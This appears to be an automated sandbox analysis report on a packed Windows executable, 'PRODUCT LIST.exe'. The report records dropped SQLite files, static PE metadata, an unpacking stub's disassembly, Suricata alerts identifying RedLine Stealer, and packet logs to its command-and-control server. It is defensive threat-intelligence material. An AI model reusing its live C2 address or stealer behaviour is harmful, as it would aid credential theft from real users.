                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpBC3F.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpBC4F.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpBC70.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpD5AB.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpF553.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpF573.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpF594.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpF5A4.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.94563762416441
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:PRODUCT LIST.exe
                                                                                      File size:1'776'640 bytes
                                                                                      MD5:a9b805862ccee6848ce91ef51a31f71d
                                                                                      SHA1:4ca749b30f879945324811f5924996765aa7d2e4
                                                                                      SHA256:9bdef064f9693bbae4a073b09a795c7b27e7486c10b3c7d920019ca3729bb434
                                                                                      SHA512:94b6cc887127129a3b51dd68b8d29e417a70e7538668f5bfb4d5e1769d74e2ce44dcef9f36ab6021e04fb1e78f710bcc859163e064d91793e5a3b756fe067d97
                                                                                      SSDEEP:24576:DRhMoSwfXo0P9Ej+zE2bb1SfyeeYF2yjfLV/JFzQXYiU4L/E/pWWG8WHHSx44s8/:DgNwfevYoaTerPtsYikWWG8GJ88Y6eb
                                                                                      TLSH:188533812523D06DD1FB083240BA2A2FFF5FBB104BA1A699EB4E55055B3ED5D4633E38
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t............@.. ........@.. .......................@[...........@................................

                                                                                      File Icon

                                                                                      Icon Hash:00928e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x80e0b0
                                                                                      Entrypoint Section:.boot
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows cui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:4328f7206db519cd4e82283211d98e83

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      call 00007FE614BE0420h
                                                                                      push ebx
                                                                                      mov ebx, esp
                                                                                      push ebx
                                                                                      mov esi, dword ptr [ebx+08h]
                                                                                      mov edi, dword ptr [ebx+10h]
                                                                                      cld
                                                                                      mov dl, 80h
                                                                                      mov al, byte ptr [esi]
                                                                                      inc esi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      mov ebx, 00000002h
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007FE614BE02BCh
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007FE614BE0323h
                                                                                      xor eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007FE614BE03B7h
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      je 00007FE614BE02DAh
                                                                                      push edi
                                                                                      mov eax, eax
                                                                                      sub edi, eax
                                                                                      mov al, byte ptr [edi]
                                                                                      pop edi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      mov ebx, 00000002h
                                                                                      jmp 00007FE614BE026Bh
                                                                                      mov eax, 00000001h
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jc 00007FE614BE02BCh
                                                                                      sub eax, ebx
                                                                                      mov ebx, 00000001h
                                                                                      jne 00007FE614BE02FAh
                                                                                      mov ecx, 00000001h
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc ecx, ecx
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jc 00007FE614BE02BCh
                                                                                      push esi
                                                                                      mov esi, edi
                                                                                      sub esi, ebp

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2203a0x50.idata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x4e4.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      0x20000x180000x8800c42c78b9832e754cb203176f75184e25False1.0006031709558822data7.994326576469916IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      0x1a0000x4de0x4004ca244fa9a5d437b9defb601583c39e2False0.7763671875data7.273072339326276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      0x1c0000xc0x200f24b480e2df71d69ab65261a0215f27dFalse0.259765625data1.7804462848428606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      .vm_sec0x1e0000x40000x4000d8f3017bae73815f607d2a4b3c4cefceFalse0.1619873046875data2.885163065318065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .idata0x220000x20000x200dbd0fc163d1022be46a45b67e74740b2False0.16796875data1.1405531534676816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x240000x20000x600f1fd96ed080911bb2659a9b13cb47065False0.376953125data3.7440317633000992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .themida0x260000x3e80000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .boot0x40e0000x1a42000x1a4200924e3b8c5d4f06112e3c6cc99d6da471False0.9948373809878013data7.95802050682975IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_VERSION0x240900x254data0.4597315436241611
                                                                                      RT_MANIFEST0x242f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.5489795918367347

                                                                                      Imports

                                                                                      DLLImport
                                                                                      kernel32.dllGetModuleHandleA
                                                                                      mscoree.dll_CorExeMain

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-24T11:49:06.021573+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.549704104.219.234.17016383TCP
                                                                                      2024-11-24T11:49:11.146262+01002045000ET MALWARE RedLine Stealer - CheckConnect Response1104.219.234.17016383192.168.2.549704TCP
                                                                                      2024-11-24T11:49:11.719835+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.549704104.219.234.17016383TCP
                                                                                      2024-11-24T11:49:17.537122+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.549706104.219.234.17016383TCP
                                                                                      2024-11-24T11:49:19.018903+01002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.549707104.219.234.17016383TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 24, 2024 11:49:04.399722099 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:04.519484997 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:04.519578934 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:04.539392948 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:04.659301043 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:04.899913073 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:05.019463062 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:05.966825008 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:06.021573067 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.026755095 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.026813984 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.146261930 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.146336079 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719696999 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719723940 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719736099 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719810963 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719821930 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719831944 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719835043 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.719846964 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719867945 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719878912 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719890118 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.719913960 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.719959974 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.727927923 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.771601915 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.839401007 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.880949020 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.930140972 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.930248022 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.930363894 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.934330940 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.934441090 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.934690952 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.942713022 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.942812920 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.943012953 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.951131105 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.951144934 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.951204062 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.959857941 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.959942102 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.959995031 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.967866898 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.967966080 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.968018055 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.977088928 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.977116108 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.977180958 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.984769106 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.984920979 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.984972954 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:11.993094921 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.993155956 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:11.993202925 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:12.001431942 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.001503944 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.001558065 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:12.009843111 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.009959936 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.010009050 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:12.050149918 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.050347090 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.050426006 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:12.140547991 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.140671015 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.140729904 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:12.143589020 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.143630028 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.143706083 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:12.148678064 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.148699045 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.148809910 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:12.154244900 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.154464006 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.154813051 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:12.159564972 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.159594059 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:12.159673929 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:15.885512114 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:15.885809898 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.006737947 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.006892920 CET1638349704104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.006979942 CET4970416383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.006979942 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.007179976 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.007436037 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.133919954 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.133938074 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.133949041 CET1638349706104.219.234.170192.168.2.5
